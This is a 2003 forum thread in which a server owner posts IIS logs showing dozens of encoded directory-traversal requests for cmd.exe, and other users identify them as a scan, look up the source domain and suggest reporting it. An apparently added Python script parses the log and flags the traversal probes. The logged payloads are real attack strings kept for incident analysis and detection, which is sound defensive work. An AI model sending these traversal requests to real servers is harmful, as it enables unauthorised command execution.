what to make of this...LONG POST

Posted: Mon Feb 03, 2003 4:56 pm
by CaterpillarAssassin
I have a small FTP/Web server. I was looking through the FTP logs when I found some MP3s in a shared folder that were not mine. Well, here are the logs...


!!!HTTP LOG!!!

#Software: Microsoft Internet Information Services 5.0
#Version: 1.0
#Date: 2003-02-03 04:06:44
#Fields: time c-ip cs-method cs-uri-stem sc-status
04:06:44 127.0.0.1 GET /links.phtml 404
04:06:44 127.0.0.1 GET /links.phtml 404
04:06:44 127.0.0.1 GET /links.phtml 404
04:06:44 127.0.0.1 GET /image-384476-1054757 404
04:12:15 12.212.218.114 GET /images/desktop.jpg 200
04:14:45 127.0.0.1 GET /links.phtml 404
04:14:45 127.0.0.1 GET /links.phtml 404
04:14:45 127.0.0.1 GET /links.phtml 404
04:14:45 127.0.0.1 GET /image-384476-1054757 404
04:34:31 192.168.0.112 OPTIONS / 200
04:34:31 192.168.0.112 PROPFIND /e 501
07:17:35 192.168.0.112 OPTIONS / 200
07:17:35 192.168.0.112 PROPFIND /e 501
07:31:17 192.168.0.112 OPTIONS / 200
07:31:17 192.168.0.112 PROPFIND /c 501
07:46:26 192.168.0.112 OPTIONS / 200
07:46:26 192.168.0.112 PROPFIND /e 501
08:08:23 192.168.0.112 OPTIONS / 200
08:10:09 192.168.0.112 OPTIONS / 200
08:12:03 192.168.0.112 OPTIONS / 200
08:13:06 209.122.110.241 HEAD /Default.htm 200
08:13:11 209.122.110.241 GET /msadc/..%5c..%5cwinnt/system32/cmd.exe 500
08:13:11 209.122.110.241 GET /msadc/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe 500
08:13:11 209.122.110.241 GET /msadc/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe 500
08:13:11 209.122.110.241 GET /msadc/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe 500
08:13:11 209.122.110.241 GET /msadc/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe 500
08:13:11 209.122.110.241 GET /msadc/..%5c..%5c..%5cwinnt/system32/cmd.exe 500
08:13:11 209.122.110.241 GET /msadc/..Á../winnt/system32/cmd.exe 500
08:13:11 209.122.110.241 GET /msadc/..Á%8s../..Á%8s../..Á%8s../winnt/system32/cmd.exe 500
08:13:11 209.122.110.241 GET /msadc/..Á%8s../winnt/system32/cmd.exe 500
08:13:11 209.122.110.241 GET /msadc/..%5c..%5c..%5cwinnt/system32/cmd.exe 500
08:13:11 209.122.110.241 GET /msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 500
08:13:11 209.122.110.241 GET /winnt/system32/cmd.exe 404
08:13:11 209.122.110.241 GET /msadc/..%5c..%5c..%5cwinnt/system32/cmd.exe 500
08:13:11 209.122.110.241 GET /msadc/..%2f..%2f..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe 500
08:13:11 209.122.110.241 GET /msadc/..À%qf../..À%qf../..À%qf../winnt/system32/cmd.exe 500
08:13:11 209.122.110.241 GET /winnt/system32/cmd.exe 404
08:13:11 209.122.110.241 GET /msadc/..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe 500
08:13:11 209.122.110.241 GET /msadc/..%5c../winnt/system32/cmd.exe 500
08:13:11 209.122.110.241 GET /msadc/..%5c..%5cwinnt/system32/cmd.exe 500
08:13:11 209.122.110.241 GET /msadc/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe 500
08:13:11 209.122.110.241 GET /msadc/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe 500
08:13:11 209.122.110.241 GET /msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 500
08:13:11 209.122.110.241 GET /msadc/..%5c..%5cwinnt/system32/cmd.exe 500
08:13:11 209.122.110.241 GET /msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 500
08:13:11 209.122.110.241 GET /msadc/..À%9v../..À%9v../..À%9v../winnt/system32/cmd.exe 500
08:13:11 209.122.110.241 GET /msadc/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe 500
08:13:11 209.122.110.241 GET /msadc/..À%9v../winnt/system32/cmd.exe 500
08:13:11 209.122.110.241 GET /winnt/system32/cmd.exe 404
08:13:11 209.122.110.241 GET /winnt/system32/cmd.exe 404
08:13:11 209.122.110.241 GET /winnt/system32/cmd.exe 404
08:13:11 209.122.110.241 GET /msadc/..À%qf../winnt/system32/cmd.exe 500
08:13:11 209.122.110.241 GET /msadc/..Á..Á..Á..Áwinnt/system32/cmd.exe 500
08:13:11 209.122.110.241 GET /msadc/..o../winnt/system32/cmd.exe 404
08:13:11 209.122.110.241 GET /winnt/system32/cmd.exe 404
08:13:12 209.122.110.241 GET /msadc/..ð€€¯../..ð€€¯../..ð€€¯../winnt/system32/cmd.exe 404
08:13:12 209.122.110.241 GET /msadc/..ø€€€¯../..ø€€€¯../..ø€€€¯../winnt/system32/cmd.exe 404
08:13:12 209.122.110.241 GET /msaDC/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe 500
08:13:12 209.122.110.241 GET /msadc/..%5c..\winnt/system32/cmd.exe 500
08:13:12 209.122.110.241 GET /msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 500
08:13:12 209.122.110.241 GET /msaDC/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe 500
08:13:12 209.122.110.241 GET /msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 500
08:13:12 209.122.110.241 GET /msadc/....../winnt/system32/cmd.exe 404
08:13:12 209.122.110.241 GET /msaDC/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe 500
08:13:12 209.122.110.241 GET /winnt/system32/cmd.exe 404
08:13:12 209.122.110.241 GET /msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 500
08:13:12 209.122.110.241 GET /winnt/system32/cmd.exe 404
08:13:12 209.122.110.241 GET /msaDC/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe 500
08:13:12 209.122.110.241 GET /msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 500
08:13:12 209.122.110.241 GET /msadc/..%\..%\winnt/system32/cmd.exe 500
08:13:12 209.122.110.241 GET /msadc/..ü€€€€¯../..ü€€€€¯../..ü€€€€¯../winnt/system32/cmd.exe 404
08:13:12 209.122.110.241 GET /msadc/..ü€€€€¯../winnt/system32/cmd.exe 404
08:13:12 209.122.110.241 GET /winnt/system32/cmd.exe 404
08:13:12 209.122.110.241 GET /winnt/system32/cmd.exe 404
08:13:14 209.122.110.241 GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe 500
08:13:14 209.122.110.241 GET /msadc/..À/..À/winnt/system32/cmd.exe 404
08:13:14 209.122.110.241 GET /msadc/winnt/system32/cmd.exe 404
08:13:14 209.122.110.241 GET /msadc/winnt/system32/cmd.exe 404
08:13:14 209.122.110.241 GET /winnt/system32/cmd.exe 404
08:13:14 209.122.110.241 GET /winnt/system32/cmd.exe 404
08:13:14 209.122.110.241 GET /winnt/system32/cmd.exe 404
08:13:14 209.122.110.241 GET /msadc/..Á../..Á../..Á../winnt/system32/cmd.exe 500
08:13:14 209.122.110.241 GET /msadc/..Á../winnt/system32/cmd.exe 500
08:13:14 209.122.110.241 GET /winnt/system32/cmd.exe 404
08:13:14 209.122.110.241 GET /winnt/system32/cmd.exe 404
08:13:14 209.122.110.241 GET /msadc/..Á..Á..Á../winnt/system32/cmd.exe 500
08:13:14 209.122.110.241 GET /msadc/.._../.._../.._../winnt/system32/cmd.exe 404
08:13:14 209.122.110.241 GET /msadc/..o../winnt/system32/cmd.exe 404
08:13:14 209.122.110.241 GET /winnt/system32/cmd.exe 404
08:13:14 209.122.110.241 GET /winnt/system32/cmd.exe 404
08:13:14 209.122.110.241 GET /msadc/..ð€€¯../..ð€€¯../..ð€€¯../winnt/system32/cmd.exe 404
08:13:14 209.122.110.241 GET /msadc/.._../winnt/system32/cmd.exe 404
08:13:15 209.122.110.241 GET /scripts/..%5c..%5c..%5cwinnt/system32/cmd.exe 500
08:13:15 209.122.110.241 GET /scripts/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe 500
08:13:15 209.122.110.241 GET /msadc/..ü€€€€¯../..ü€€€€¯../..ü€€€€¯../winnt/system32/cmd.exe 404
08:13:15 209.122.110.241 GET /scripts/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe 500
08:13:15 209.122.110.241 GET /msadc/check.bat/..À/..À/..À/winnt/system32/cmd.exe 404
08:13:15 209.122.110.241 GET /winnt/system32/cmd.exe 404
08:13:15 209.122.110.241 GET /msadc/check.bat/..Á..Á..Áwinnt/system32/cmd.exe 404
08:13:15 209.122.110.241 GET /winnt/system32/cmd.exe 404
08:13:15 209.122.110.241 GET /winnt/system32/cmd.exe 404
08:13:15 209.122.110.241 GET /msadc/..Á../..Á../..Á../winnt/system32/cmd.exe 500
08:13:15 209.122.110.241 GET /msadc/..Á%pc../..Á%pc../..Á%pc../winnt/system32/cmd.exe 500
08:13:15 209.122.110.241 GET /msadc/..Á%pc../winnt/system32/cmd.exe 500
08:13:15 209.122.110.241 GET /msadc/..o../..o../..o../winnt/system32/cmd.exe 404
08:13:17 209.122.110.241 GET /msadc/..Á%pc../winnt/system32/cmd.exe 500
08:13:17 209.122.110.241 GET /msadc/..Á%pc../..Á%pc../..Á%pc../winnt/system32/cmd.exe 500
08:13:17 209.122.110.241 GET /msadc/..ð€€¯../winnt/system32/cmd.exe 404
08:13:17 209.122.110.241 GET /msadc/..ø€€€¯../winnt/system32/cmd.exe 404
08:13:17 209.122.110.241 GET /msadc/..ø€€€¯../..ø€€€¯../..ø€€€¯../winnt/system32/cmd.exe 404
08:13:17 209.122.110.241 GET /scripts/..%2f..%2f..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe 500
08:13:17 209.122.110.241 GET /scripts/..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe 500
08:13:17 209.122.110.241 GET /scripts/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 500
08:13:17 209.122.110.241 GET /scripts/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe 500
08:13:17 209.122.110.241 GET /scripts/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe 500
08:13:17 209.122.110.241 GET /scripts/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe 500
08:13:17 209.122.110.241 GET /scripts/..%5c..%5c..%5cwinnt/system32/cmd.exe 500
08:13:17 209.122.110.241 GET /scripts/..Á%8s../..Á%8s../..Á%8s../winnt/system32/cmd.exe 500
08:13:17 209.122.110.241 GET /scripts/..Á%8s../winnt/system32/cmd.exe 500
08:13:17 209.122.110.241 GET /scripts/..%5c..%5cwinnt/system32/cmd.exe 500
08:13:17 209.122.110.241 GET /scripts/..À%qf../..À%qf../..À%qf../winnt/system32/cmd.exe 500
08:13:17 209.122.110.241 GET /winnt/system32/cmd.exe 404
08:13:17 209.122.110.241 GET /scripts/..%5c..%5cwinnt/system32/cmd.exe 500
08:13:17 209.122.110.241 GET /scripts/..À%qf../winnt/system32/cmd.exe 500
08:13:17 209.122.110.241 GET /scripts/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 500
08:13:17 209.122.110.241 GET /winnt/system32/cmd.exe 404
08:13:18 209.122.110.241 GET /scripts/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 500
08:13:18 209.122.110.241 GET /scripts/..Á../..Á../..Á../winnt/system32/cmd.exe 500
08:13:18 209.122.110.241 GET /winnt/system32/cmd.exe 404
08:13:18 209.122.110.241 GET /scripts/..%5c../winnt/system32/cmd.exe 500
08:13:18 209.122.110.241 GET /scripts/..Á../winnt/system32/cmd.exe 500
08:13:18 209.122.110.241 GET /winnt/system32/cmd.exe 404
08:13:18 209.122.110.241 GET /scripts/..À%9v../..À%9v../..À%9v../winnt/system32/cmd.exe 500
08:13:18 209.122.110.241 GET /scripts/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe 500
08:13:18 209.122.110.241 GET /scripts/..À%9v../winnt/system32/cmd.exe 500
08:13:18 209.122.110.241 GET /winnt/system32/cmd.exe 404
08:13:18 209.122.110.241 GET /scripts/..%5c..%5c..%5cwinnt/system32/cmd.exe 500
08:13:18 209.122.110.241 GET /winnt/system32/cmd.exe 404
08:13:18 209.122.110.241 GET /msadc/..ð€€¯../winnt/system32/cmd.exe 404
08:13:18 209.122.110.241 GET /msadc/..ø€€€¯../winnt/system32/cmd.exe 404
08:13:19 209.122.110.241 GET /winnt/system32/cmd.exe 404
08:13:19 209.122.110.241 GET /scripts/..o../..o../..o../winnt/system32/cmd.exe 404
08:13:19 209.122.110.241 GET /scripts/..Á%pc../..Á%pc../..Á%pc../winnt/system32/cmd.exe 500
08:13:19 209.122.110.241 GET /scripts/..o../winnt/system32/cmd.exe 404
08:13:19 209.122.110.241 GET /scripts/..Á%pc../winnt/system32/cmd.exe 500
08:13:19 209.122.110.241 GET /scripts/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 500
08:13:19 209.122.110.241 GET /scripts/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe 500
08:13:19 209.122.110.241 GET /winnt/system32/cmd.exe 404
08:13:19 209.122.110.241 GET /scripts/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe 500
08:13:19 209.122.110.241 GET /winnt/system32/cmd.exe 404
08:13:19 209.122.110.241 GET /scripts/..ð€€¯../..ð€€¯../..ð€€¯../winnt/system32/cmd.exe 404
08:13:19 209.122.110.241 GET /scripts/..%5c..%5c..%5cwinnt/system32/cmd.exe 500
08:13:19 209.122.110.241 GET /scripts/..%5c..%5cwinnt/system32/cmd.exe 500
08:13:19 209.122.110.241 GET /winnt/system32/cmd.exe 404
08:13:19 209.122.110.241 GET /winnt/system32/cmd.exe 404
08:13:19 209.122.110.241 GET /scripts/..%\..%\winnt/system32/cmd.exe 500
08:13:19 209.122.110.241 GET /scripts/..ü€€€€¯../..ü€€€€¯../..ü€€€€¯../winnt/system32/cmd.exe 404
08:13:19 209.122.110.241 GET /scripts/..%5c..\winnt/system32/cmd.exe 500
08:13:19 209.122.110.241 GET /scripts/..ð€€¯../winnt/system32/cmd.exe 404
08:13:19 209.122.110.241 GET /scripts/....../winnt/system32/cmd.exe 404
08:13:19 209.122.110.241 GET /scripts/..ø€€€¯../..ø€€€¯../..ø€€€¯../winnt/system32/cmd.exe 404
08:13:19 209.122.110.241 GET /winnt/system32/cmd.exe 404
08:13:19 209.122.110.241 GET /winnt/system32/cmd.exe 404
08:13:19 209.122.110.241 GET /script/winnt/system32/cmd.exe 404
08:13:19 209.122.110.241 GET /scripts/..ø€€€¯../winnt/system32/cmd.exe 404
08:13:20 209.122.110.241 GET /winnt/system32/cmd.exe 404
08:13:20 209.122.110.241 GET /script/..Á../..Á../..Á../winnt/system32/cmd.exe 404
08:13:20 209.122.110.241 GET /script/.._../.._../.._../winnt/system32/cmd.exe 404
08:13:20 209.122.110.241 GET /winnt/system32/cmd.exe 404
08:13:20 209.122.110.241 GET /scripts/..%5c../winnt/system32/cmd.exe 500
08:13:20 209.122.110.241 GET /scripts/.%2e/.%2e/winnt/system32/cmd.exe 500
08:13:20 209.122.110.241 GET /scripts/..%5c../winnt/system32/cmd.exe 500
08:13:20 209.122.110.241 GET /scripts/..%5c../winnt/system32/cmd.exe 500
08:13:20 209.122.110.241 GET /scripts/..Á..Á..Á..Áwinnt/system32/cmd.exe 500
08:13:20 209.122.110.241 GET /scripts/..Á../..Á../..Á../winnt/system32/cmd.exe 500
08:13:20 209.122.110.241 GET /scripts/..Á../winnt/system32/cmd.exe 500
08:13:20 209.122.110.241 GET /scripts/..Á%8s../winnt/system32/cmd.exe 500
08:13:20 209.122.110.241 GET /winnt/system32/cmd.exe 404
08:13:20 209.122.110.241 GET /winnt/system32/cmd.exe 404
08:13:20 209.122.110.241 GET /winnt/system32/cmd.exe 404
08:13:20 209.122.110.241 GET /winnt/system32/cmd.exe 404
08:13:20 209.122.110.241 GET /scripts/..À%qf../winnt/system32/cmd.exe 500
08:13:20 209.122.110.241 GET /winnt/system32/cmd.exe 404
08:13:20 209.122.110.241 GET /scripts/..Á..Á..Á..Á../winnt/system32/cmd.exe 500
08:13:20 209.122.110.241 GET /scripts/..À%9v../winnt/system32/cmd.exe 500
08:13:20 209.122.110.241 GET /scripts/winnt/system32/cmd.exe 404
08:13:20 209.122.110.241 GET /winnt/system32/cmd.exe 404
08:13:20 209.122.110.241 GET /winnt/system32/cmd.exe 404
08:15:15 192.168.0.112 OPTIONS / 200
08:15:15 192.168.0.112 PROPFIND /e 501
12:34:04 80.196.111.238 GET /sumthin 404
17:55:07 127.0.0.1 GET /links.phtml 404
18:03:35 127.0.0.1 GET /ads/MSNHPB/00292MO0286_S4.gif 404
18:03:35 127.0.0.1 GET /ads/MSNBFP/00292T40136_D2.gif 404
18:07:36 192.168.0.112 OPTIONS / 200
18:07:36 192.168.0.112 PROPFIND /e 501
21:54:05 192.168.0.112 OPTIONS / 200
21:54:05 192.168.0.112 PROPFIND /e 501
21:59:22 192.168.0.112 OPTIONS / 200
21:59:22 192.168.0.112 PROPFIND /c 501

!!!END LOG!!!


Is this someone trying to hack? Trying to get CMD.EXE is a no-no... any ideas here?
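
The log above can be triaged automatically. The script below is an added example, not part of the original post: it parses the IIS 5.0 W3C extended format using the `#Fields:` directive, canonicalises each requested path the way a lenient decoder would (repeated percent-decoding for `%255c`-style double encoding, and an approximation of the overlong UTF-8 handling behind the `%c0%af` / `%c1%9c` traversal bug, both of which are assumptions about IIS behaviour rather than a copy of its code), and then counts traversal and `cmd.exe` probes per client IP together with the status codes they got back. The sample input is a constructed subset: a few lines copied from the log above plus two constructed lines carrying the still-encoded forms (`%c0%af`, `%255c`) that IIS normally writes to the log already decoded.

```python
"""Triage an IIS W3C extended log for directory-traversal / cmd.exe probes."""
import re
from collections import Counter, defaultdict

# Constructed sample: lines from the posted log plus two made-up lines
# (the %c0%af and %255c ones) so the decoders have something to do.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 5.0
#Version: 1.0
#Date: 2003-02-03 04:06:44
#Fields: time c-ip cs-method cs-uri-stem sc-status
04:12:15 12.212.218.114 GET /images/desktop.jpg 200
08:13:11 209.122.110.241 GET /msadc/..%5c..%5cwinnt/system32/cmd.exe 500
08:13:11 209.122.110.241 GET /msadc/..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe 500
08:13:11 209.122.110.241 GET /winnt/system32/cmd.exe 404
08:13:17 209.122.110.241 GET /scripts/..%c0%af../winnt/system32/cmd.exe 500
08:13:20 209.122.110.241 GET /scripts/..%255c..%255cwinnt/system32/cmd.exe 500
12:34:04 80.196.111.238 GET /sumthin 404
"""

_PCT = re.compile(r'%([0-9A-Fa-f]{2})')
TRAVERSAL = re.compile(r'(^|/)\.\.(/|$)')   # a ".." path component after canonicalisation
CMD_EXE = re.compile(r'/cmd\.exe$')


def parse_w3c(text):
    """Yield one dict per data line, keyed by the names in the #Fields directive."""
    fields = None
    for raw in text.splitlines():
        if not raw.strip():
            continue
        if raw.startswith('#'):
            if raw.startswith('#Fields:'):
                fields = raw.split()[1:]
            continue
        if fields is None:
            raise ValueError('data line before #Fields directive')
        values = raw.split()
        if len(values) != len(fields):
            continue  # malformed line: skip rather than misalign columns
        yield dict(zip(fields, values))


def _pct_decode_bytes(s):
    """Turn %XX escapes into raw bytes; invalid escapes (e.g. %qf) stay literal."""
    out = bytearray()
    i = 0
    while i < len(s):
        m = _PCT.match(s, i)
        if m:
            out.append(int(m.group(1), 16))
            i = m.end()
        else:
            out.extend(s[i].encode('latin-1', 'replace'))
            i += 1
    return bytes(out)


def _lenient_utf8(b):
    """Approximation (assumption, not IIS source) of the decoder that accepted
    overlong 2- and 3-byte sequences such as %c0%af -> '/' and %c1%9c -> '\\',
    ignoring the 10xxxxxx prefix check on continuation bytes."""
    out, i, n = [], 0, len(b)
    while i < n:
        c = b[i]
        if c < 0x80:
            out.append(chr(c)); i += 1
        elif 0xC0 <= c <= 0xDF and i + 1 < n:
            out.append(chr(((c & 0x1F) << 6) | (b[i + 1] & 0x3F))); i += 2
        elif 0xE0 <= c <= 0xEF and i + 2 < n:
            out.append(chr(((c & 0x0F) << 12) | ((b[i + 1] & 0x3F) << 6) | (b[i + 2] & 0x3F))); i += 3
        else:
            out.append(chr(c)); i += 1
    return ''.join(out)


def canonical_path(uri, max_rounds=3):
    """Decode repeatedly (catches %255c double encoding), run the lenient UTF-8
    step (catches overlong %c0%af), then fold backslashes and case."""
    s = uri
    for _ in range(max_rounds):
        decoded = _lenient_utf8(_pct_decode_bytes(s))
        if decoded == s:
            break
        s = decoded
    return s.replace('\\', '/').lower()


def classify(uri):
    """Return (canonical path, list of tags) for one requested URI."""
    path = canonical_path(uri)
    tags = []
    if TRAVERSAL.search(path):
        tags.append('traversal')
    if CMD_EXE.search(path):
        tags.append('cmd.exe')
    if tags and '%' in uri:
        tags.append('encoded')
    return path, tags


def triage(text):
    """Per-IP summary of probe lines: count, status codes seen, tags seen."""
    per_ip = defaultdict(lambda: {'probes': 0, 'statuses': Counter(), 'tags': Counter()})
    for rec in parse_w3c(text):
        _, tags = classify(rec['cs-uri-stem'])
        if not tags:
            continue
        entry = per_ip[rec['c-ip']]
        entry['probes'] += 1
        entry['statuses'][rec['sc-status']] += 1
        entry['tags'].update(tags)
    return dict(per_ip)


def any_executed(summary):
    """True if any probe got a 200: on a cmd.exe request that means it ran."""
    return any(e['statuses'].get('200', 0) for e in summary.values())


if __name__ == '__main__':
    result = triage(SAMPLE_LOG)
    for ip, entry in result.items():
        print(ip, entry['probes'], dict(entry['statuses']), dict(entry['tags']))
    print('command execution observed:', any_executed(result))
```

Reading the summary is the useful part: 500 and 404 on every `cmd.exe` request, as in the posted log, means the traversal was rejected or the file was not reachable under the web root; a 200 on one of those lines would be the signal that a command actually executed and the box needs to be treated as compromised rather than merely scanned.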

Posted: Mon Feb 03, 2003 8:41 pm
by PreDatoR
Ya, you were getting hacked... IIS, man, you should know better than to use that shit...

Posted: Mon Feb 03, 2003 10:39 pm
by matt719
i wonder if he had an IP cloak ;)

Posted: Tue Feb 04, 2003 12:55 am
by CaterpillarAssassin
Well, judging by all the 500 errors and 404s, he didn't get far. So I guess IIS isn't that bad now, is it? :)

Posted: Tue Feb 04, 2003 1:08 am
by PreDatoR
LOL ya, if you've updated all of Winblowz then for the time being it ain't bad... anyone who runs IIS on a 2k or XP box that doesn't need it running gets what they deserve if they get hacked.. most people run it just for an FTP when there are progs out there that do things so much better and easier... and SAFER!

Posted: Tue Feb 04, 2003 1:22 am
by CaterpillarAssassin
tracert'd that IP and it came back with avtivedom49.erols.com. Put the IP into my browser and it came up with a starter page for IIS. hmmm...... wonder if they're morons, or if he spoofed his IP. IDK. I blocked the IP on my firewall anyway.

Posted: Tue Feb 04, 2003 2:12 am
by PreDatoR
Anyone with half a brain would be going through anonymous proxies to hack anyway... so I highly doubt it's their IP addy...

Posted: Tue Feb 04, 2003 2:15 am
by BillyGoat
Yep, scanning for openings in IIS.


Registrant:
Erol's Internet Service (EROLS-DOM)
7921 Woodruff Court
Springfield
VA,22151
US

Domain Name: EROLS.COM

Administrative Contact:
RCN Terms of Service (ETS3-ORG) abuse@RCN.COM
RCN
7921 Woodruff Court
Springfield, VA 22151
US
703-321-8000
Fax- 703-321-8316
Technical Contact:
RCN (EROLS-NOC) domreg@RCN.COM
RCN
1 Federal St
Springfield, MA 01105
US
(609) 734-3700 fax: 609-919-8574

Record expires on 01-May-2011.
Record created on 30-Apr-1995.
Database last updated on 4-Feb-2003 02:13:27 EST.

Domain servers in listed order:

AUTH1.DNS.RCN.NET 207.172.3.20
AUTH3.DNS.RCN.NET 207.172.3.21
AUTH2.DNS.RCN.NET 207.172.3.20

You should contact them; they should be able to check their logs and do something about it. I doubt it was spoofed; script kiddies aren't that brilliant these days, but who knows.

Posted: Tue Feb 04, 2003 3:44 am
by CaterpillarAssassin
Thanks a lot for the info, BillyGoat. I'll probably shoot them an email tomorrow. It is sleepy time now....

Posted: Tue Feb 04, 2003 4:07 am
by DoPeY5007
I get that with Apache as well...



I send net sends to the IP addresses that try to hack me :-p

Posted: Tue Feb 04, 2003 1:22 pm
by CaterpillarAssassin
Excellent idea, Dopey :)

Posted: Tue Feb 04, 2003 1:24 pm
by CaterpillarAssassin
Dammit, their machine is off! :( I'll be checking back later today though :)